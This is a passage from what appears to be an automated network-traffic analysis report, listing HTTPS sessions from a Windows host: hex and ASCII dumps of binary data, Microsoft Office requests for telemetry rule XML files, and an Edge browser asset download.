                                                                                                                                                                                                        Data Ascii: g9P3[=[b'1\%}~i?2tmA@0!0VC\:*_Gp`n3.e_j;`?ihbE}*Z_"]ya8/b</8iEC>niM*]z_]y]DZgtc>qDX\\M,SqPn0INB`"Sgo0
                                                                                                                                                                                                        2024-12-04 12:53:33 UTC16384INData Raw: 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30 df bf cb 6f cb 2a 09 d7 1f 99 f4 19 6a 7e d9 a5 f8 7e 7b c5 59 31 55 b2 99 9f 7d 02 06 e8 6e c6 98 ec a9 7c 3f 2a 1d 34 e5 bd 0a 8f e7 88 3e 74 c3 0b e7 6b 10 2c 4f 53 5d 7c 86 e2 09 77 99 7d ee 02 3a 9d f3 a7 29 a2 13 79 ee 15 d2 a7 37 fd 67 b6 f7 67 33 72 df b2 23 59 ef 55 5d e5 6f cb 55 7e 43 6c b7 99 fc 2e 56 9e 6f 2b 5e 74 f2 ea 6e 17 ed 6d 37 04 2d f5 5a 8e f8 43 2b c3 03
                                                                                                                                                                                                        Data Ascii: MR\!1Q|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0o*j~~{Y1U}n|?*4>tk,OS]|w}:)y7gg3r#YU]oU~Cl.Vo+^tnm7-ZC+
                                                                                                                                                                                                        2024-12-04 12:53:33 UTC16384INData Raw: 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61 e7 32 c4 b3 5e a1 8d a0 20 7d 39 b0 28 5c c6 6d 21 84 b7 80 4c dc 70 c4 2e c4 f3 19 21 9c 8e d6 1f 96 d8 f4 9d 32 40 37 a4 47 84 1e d1 c7 65 89 5f 63 82 1d d4 5a 86 2d e5 f8 15 59 45 61 ea 67 ab 2d d9 61 85 e3 91 0f 94 e7 67 25 02 3d 4f 28 55 ad 17 c6 a0 29 6a 5d 21 2a cd 7e af 45 5e 0b 01 e5 6c bb ed 07 fa bc 5c f7 4e 60 6b e1 20 c2 ba 99 b8 6d 1e 51 d5 3c d5 da e1 b5 2c a1 ec
                                                                                                                                                                                                        Data Ascii: yfr;Tt5S};PtEr~*uVOLC=A{5__p*tHt|B8peG![Xb!la2^ }9(\m!Lp.!2@7Ge_cZ-YEag-ag%=O(U)j]!*~E^l\N`k mQ<,
                                                                                                                                                                                                        2024-12-04 12:53:33 UTC16384INData Raw: 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66 52 b2 05 40 56 84 20 c3 90 88 0a 5a 8e f1 3d 96 59 b7 5f a7 63 31 3c 17 3a a9 04 30 4b 80 0e 09 8b 60 e1 5d df da 55 e1 6d 20 56 de 3a 5a 4e 4e 36 25 71 5c 12 7e f1 93 97 31 94 a1 29 89 f2 0a 40 a9 02 bf 55 03 2f 98 74 5f 78 73 cb c5 29 4c e9 ad ef d3 e0 e9 ec 15 b9 9a 03 cf 91 db 7e f5 f0 08 3e bd 4a a1 b3 a7 63 d1 45 bf 50 93 bc bc 7d c3 e9 75 22 5d 68 d9 1e 50 8f 5c 23 a1 36
                                                                                                                                                                                                        Data Ascii: .Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^|sfR@V Z=Y_c1<:0K`]Um V:ZNN6%q\~1)@U/t_xs)L~>JcEP}u"]hP\#6
                                                                                                                                                                                                        2024-12-04 12:53:33 UTC16384INData Raw: 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b f8 f4 09 87 9a 38 33 24 7f 45 a2 7e d3 4f 4e 87 8c cb 8b 02 7f df 7f ff 57 75 a1 22 3d 51 a9 78 41 7d 1b c5 f8 9b d0 7f 72 fc 7d ff 85 6a 70 ab 5e dc aa 41 ca 56 bd b0 55 00 76 02 c7 a0 ea 57 7d b2 c3 fb 0a b5 58 bd 1f ab f6 63 d5 ec bd 82 b3 c7 5f d5 89 ed 15 3f f6 0a e5 7d 86 bf 7b f2 4f 82 f3 1a ea 09 06 a9 c9 03 c6 95 ea 57 bd 73 50 18 1d 54 fb 07 d5 da 41 bd 99 aa 6f 53 85
                                                                                                                                                                                                        Data Ascii: \m}v0d'R}g]]OZ&z+gK[|U_dZCN3RaDO9')qG~@/nI,Xr+/N;83$E~ONWu"=QxA}r}jp^AVUvW}Xc_?}{OWsPTAoS
                                                                                                                                                                                                        2024-12-04 12:53:33 UTC16384INData Raw: 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06 bc 0c 5d f6 df fe e1 b9 f2 44 21 e0 ef 42 ef 50 c9 9d 6d c4 b7 e0 a2 c1 1c b4 2f 36 29 c7 0d cd c5 5f 01 b2 80 f3 b0 10 3b 89 01 c5 9d d8 7c 07 2e 18 db 27 d6 4f f2 63 9c b0 f6 f2 ae c9 8b 6c b2 c4 37 76 c1 ad 55 68 26 ab 9f 6e 0d f6 97 8b d0 7b ae f0 47 ed 5d 9f e5 af 8e d0 8d 25 c1 76 f1 dc 48 82 c0 c8 4e c8 12 40 65 5d 3f 2f 1b ab ff 79 9a 2b b3 79 5d 62 4f 7c d5 ff 34 22 f6
                                                                                                                                                                                                        Data Ascii: Jj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j]D!BPm/6)_;|.'Ocl7vUh&n{G]%vHN@e]?/y+y]bO|4"
                                                                                                                                                                                                        2024-12-04 12:53:33 UTC16384INData Raw: 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b 60 ea 7c b9 bf 27 e4 0d 14 35 5a 3a 2d d3 09 b2 1d da a4 23 ee 1b c6 42 eb 6f 46 58 98 31 2d 33 81 d2 c7 b9 ea 4a e4 45 53 f8 1b 85 d6 9a f9 1c dd e5 4a cf 08 96 59 af e8 ce 28 b3 02 0e 0d ee 14 62 4a 58 2a 40 44 d3 12 5b 39 93 33 26 50 17 82 cc e2 88 1a 71 ab dd fe 3c 12 6a 79 40 5e 32 8d a6 25 53 15 5e 3f 60 3e a6 cb e9 d4 75 42 52 43 29 e8 e5 94 bf 82 e4 a6 c8 40 37 67 5f 41
                                                                                                                                                                                                        Data Ascii: dqP7J"RUJS<?e3(Z.v4zg9>X#,~0*"1OvD#jK_F(Mu,abs&0`K`|'5Z:-#BoFX1-3JESJY(bJX*@D[93&Pq<jy@^2%S^?`>uBRC)@7g_A


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        55192.168.2.74978213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:33 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:33 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 448
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                        x-ms-request-id: 6baa9d1a-801e-0048-02ce-45f3fb000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125333Z-1746fd949bdjzh7thC1EWR3g640000000180000000007gvp
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:33 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        56192.168.2.74978113.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:33 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:33 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 475
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                        x-ms-request-id: 935017b2-001e-0017-80c6-450c3c000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125333Z-1746fd949bdzd2qvhC1EWRcygw00000000yg000000007be5
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:33 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        57192.168.2.74978313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:33 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:33 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 491
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                        x-ms-request-id: 715419d5-801e-0078-38c7-45bac6000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125333Z-1746fd949bdtlp5chC1EWRq1v4000000019g0000000002ff
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:34 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        58192.168.2.74978513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:34 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:34 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 416
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                        x-ms-request-id: 0e2e5981-501e-0035-17c1-45c923000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125334Z-1746fd949bdfg4slhC1EWR34t0000000010000000000anqb
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:34 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        59192.168.2.74978013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:35 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:39 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 425
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                        x-ms-request-id: 5f5d2afa-901e-0015-66cc-45b284000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125339Z-1746fd949bd2cq7chC1EWRnx9g00000000z000000000160a
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:39 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        60192.168.2.74978613.107.246.404437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:35 UTC438OUTGET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1
                                                                                                                                                                                                        Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                        2024-12-04 12:53:35 UTC543INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:35 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 1579
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Last-Modified: Fri, 03 Nov 2023 21:43:08 GMT
                                                                                                                                                                                                        ETag: 0x8DBDCB5DE99522A
                                                                                                                                                                                                        x-ms-request-id: f052c515-001e-004e-7d4b-46ade2000000
                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                        x-azure-ref: 20241204T125335Z-1746fd949bdw2rg8hC1EWR11u400000001hg00000000466w
                                                                                                                                                                                                        Cache-Control: public, max-age=604800
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 69316365
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:35 UTC1579INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 c0 49 44 41 54 78 01 ed 58 4f 8b 5c 45 10 af 7a f3 66 66 15 c5 fd 00 42 66 f2 05 b2 22 c2 1e 54 d6 4f 90 15 c1 63 d8 e0 49 04 37 01 11 11 25 89 e0 d5 04 0f 1a f0 e0 e6 62 c4 cb 1e 44 50 21 b8 df 20 7b f0 4f 6e 1b 4f 8b 20 cc 7a 89 b3 ef 75 57 f9 ab ea 9e 37 cb 66 77 66 36 93 83 84 ad a4 d3 fd de eb 79 fd 7b bf fa 55 75 75 88 4e ed d4 9e 20 5b d9 dc ed 2d df de ed d1 63 34 a6 39 6c e5 fb c1 4a 54 39 2f 42 ab 22 d2 8b 91 54 a2 92 d4 91 63 90 6d 09 74 57 2a fd fc b7 77 9e df a6 47 b4 47 02 b8 f2 f3 60 29
                                                                                                                                                                                                        Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxXO\EzffBf"TOcI7%bDP! {OnO zuW7fwf6y{UuuN [-c49lJT9/B"TcmtW*wGG`)


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        61192.168.2.74978713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:35 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:35 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 479
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
